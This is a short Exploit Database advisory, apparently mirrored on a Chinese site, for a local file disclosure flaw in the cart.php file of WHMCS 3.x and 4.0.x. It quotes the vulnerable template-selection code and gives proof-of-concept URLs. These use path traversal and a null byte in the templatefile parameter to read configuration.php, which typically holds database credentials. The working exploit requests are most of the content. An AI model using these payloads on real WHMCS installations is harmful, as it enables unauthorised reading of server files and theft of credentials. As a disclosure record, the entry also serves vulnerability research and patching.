WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure

• Exploit Database
• 492 阅读

• 作者： Lagripe-Dz & Mca-Crb
  日期： 2011-10-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17999/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

  # Title: WHMCompleteSolution (cart.php) Local File Disclosure # Author : Lagripe-Dz # Product: WHMCS ( WHMCompleteSolution ) # Vendor : http://whmcs.com/ # Date : 10/01/2011 # Version: 3.x.x , 4.0.x # Tested on: linux+apache   ================================================================   Vuln file: cart.php ---------   Vuln code: ---------   if ( $a == "add" ) { $templatefile = "configureproductdomain"; ....etc }   if ( $a == "login" ) { $templatefile = "login"; ....etc } ... outputClientArea( $templatefile, $nowrapper ); # outputClientArea function will display "./templates/orderforms/cart/{$templatefile}.tpl"     Details : ---------   if variable "$a" has a true value .. will set "$templatefile" value by default but when "$a" value didn't match the defaults values you can control "$templatefile" and use it as ( File Disclosure )     Proof of Concept : ------------------   http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00   http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00     note* : show the page source to see Disclosure file.   Solution : ----------   the vendor Notificate update to the last version   ================================================================   Greetz To All www.Sec4ever.com Members.